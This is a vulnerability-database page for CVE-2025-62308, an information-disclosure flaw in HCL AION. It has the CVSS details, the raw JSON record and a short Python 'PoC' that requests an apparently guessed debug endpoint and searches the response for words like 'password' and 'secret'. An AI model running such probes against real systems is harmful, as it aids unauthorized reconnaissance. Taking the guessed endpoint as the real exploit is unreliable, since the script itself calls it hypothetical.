Security Vulnerability Report
中文
CVE-2025-62308 CVSS 5.1 MEDIUM

CVE-2025-62308

Published: 2026-05-14 17:16:18
Last Modified: 2026-05-14 17:22:47
Source: [email protected]

Description

HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

HCL AION (具体受影响版本请参考厂商公告 KB0130636)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-62308 (Conceptual) # This script demonstrates a potential request that triggers information disclosure. # Note: Actual parameters and endpoints require specific environment analysis. import requests def check_info_disclosure(target_url, session_cookie): """ Attempts to access a vulnerable endpoint that exposes backend infrastructure details. """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Cookie": session_cookie, "Accept": "application/json, text/plain, */*" } # Hypothetical endpoint based on information disclosure patterns vulnerable_endpoint = "/api/internal/config/debug" try: response = requests.get(f"{target_url}{vulnerable_endpoint}", headers=headers, verify=False, timeout=10) if response.status_code == 200: print("[+] Potential vulnerability detected!") print("[+] Response content:") print(response.text) # Check for sensitive keywords in response sensitive_keywords = ['password', 'secret', 'key', 'internal', 'infra', 'config'] found_keywords = [word for word in sensitive_keywords if word.lower() in response.text.lower()] if found_keywords: print(f"[!] Sensitive data found: {', '.join(found_keywords)}") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target and credentials target = "http://example-hcl-aion.com" cookie = "session_id=low_priv_user_token" check_info_disclosure(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62308", "sourceIdentifier": "[email protected]", "published": "2026-05-14T17:16:17.913", "lastModified": "2026-05-14T17:22:46.577", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where sensitive backend infrastructure details may be exposed. Exposure of such information could reveal internal system architecture or configuration details, which may potentially assist in further analysis or targeted actions under certain conditions"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130636", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.